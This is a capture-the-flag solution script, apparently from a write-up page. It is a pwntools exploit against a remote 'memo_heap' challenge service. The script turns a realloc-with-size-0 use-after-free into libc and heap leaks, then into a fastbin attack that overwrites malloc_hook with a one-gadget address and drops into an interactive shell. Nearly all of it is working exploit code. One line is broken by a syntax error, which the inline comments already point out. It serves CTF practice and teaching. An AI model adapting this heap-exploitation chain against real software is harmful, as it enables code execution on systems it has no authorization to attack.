Tags: pwn 


realloc with size 0 -> use-after-free -> heap pointer overwrite

from pwn import *

# Local run against the challenge binary with its bundled libc; the offsets
# used below (0x3c4c78, 0x3c4b10, 0xf1117) are tied to that libc build.
#p=process(['./memo_heap'],env={'LD_PRELOAD':'./memoheap_libc.so.6'})
# Remote challenge service used by the rest of the script.
p=remote('memoheap.acebear.site',3003)

def create(size, name):
    """Menu option 1: allocate an entry of `size` bytes filled with `name`."""
    dialogue = (
        ('choice: ', '1'),
        ('? ', str(size)),
        (': ', name),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)

def edit(idx, name):
    """Menu option 2: replace the content of entry `idx` with `name`."""
    dialogue = (
        ('choice: ', '2'),
        (': ', str(idx)),
        (': ', name),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)

def show(idx):
    """Menu option 3: ask the service to print entry `idx` (caller reads it)."""
    dialogue = (
        ('choice: ', '3'),
        (': ', str(idx)),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)

def delete(idx):
    """Menu option 4: free entry `idx`."""
    dialogue = (
        ('choice: ', '4'),
        (': ', str(idx)),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)

# Wait for the menu banner before the first interaction.
p.recvuntil('Menu')
# --- libc leak -----------------------------------------------------------
# Two 0x100 entries, free the first, then re-create index 0 with 8 bytes.
# The value read back after the 'A'*8 marker is treated as a libc pointer
# (named main_arena below); this relies on the freed chunk's contents still
# being readable through index 0 — an allocator-specific assumption.
create(0x100,'AAAA')
create(0x100,'BBBB')
delete(0)
create(8,'A'*8)
show(0)
sleep(1)
p.recvuntil('A'*8)
# 6 bytes of pointer, zero-padded to 8 for u64.
main_arena = u64(p.recv(6)+'\x00\x00')
# Offsets below are specific to the challenge's libc (memoheap_libc.so.6);
# they are not valid for any other libc build.
libc_base = main_arena - 0x3c4c78
malloc_hook = libc_base + 0x3c4b10
one_shot = libc_base + 0xf1117
# Python 2 print statements (pwntools-era script).
print hex(main_arena)
print hex(libc_base)
print hex(malloc_hook)
sleep(1)
# --- heap leak -----------------------------------------------------------
create(8,'C'*8)
delete(2)
# NOTE(review): two statements share this line; as written this is a
# SyntaxError, presumably a line break lost when the page was extracted.
delete(0)create(1,'Z') #0
show(0)
p.recvuntil('Name: Z')
# Only 5 bytes are read back; the low byte is assumed to be 0x00 (not
# echoed) and is prepended, then zero-padded to 8 for u64.
heap = u64('\x00'+p.recv(5)+'\x00\x00')
print hex(heap)
delete(0)
sleep(1)
delete(1)
create(0x5f,'A'*8) #0

# --- use-after-free via size 0 -------------------------------------------
# Per the page title, a size-0 request goes through realloc: edit(1,'')
# presumably releases index 1's buffer while the index keeps its pointer.
# NOTE(review): inferred from the title, not visible in this script — confirm
# against the binary.
create(0,'') #1
edit(1,'')
create(8,'C'*8) #2
delete(1)

# Index 0 is filled with what looks like a (pointer, size, flag) record —
# p64(heap+0x10), p32(0x5f), p32(0x1) — so index 0 and index 2 now refer to
# the same memory (author's "#0 == 2"). Record layout is an assumption —
# confirm against the binary.
create(16,p64(heap+0x10)+p32(0x5f)+p32(0x1)) #0 == 2
create(0x5f,'D'*8) #3
# Author's bookkeeping of the free order: 0 3 0 == 2 3 0.
delete(2) #0 3 0 == 2 3 0
delete(3)
delete(0)
print '=='
# --- redirect an allocation onto malloc_hook -----------------------------
# The -0x23 offset is chosen so the bytes near malloc_hook look like a valid
# 0x60-class chunk header to the allocator (libc-specific; confirm offset).
create(0x5f,p64(malloc_hook-0x23))
create(0x5f,'D'*8)
create(0x5f,'A'*8)
# 0x13 bytes of padding places p64(one_shot) over malloc_hook itself.
create(0x5f,'E'*0x13+p64(one_shot))

# One more allocation request (menu option 1) invokes the hook.
p.sendlineafter(': ','1')

p.interactive()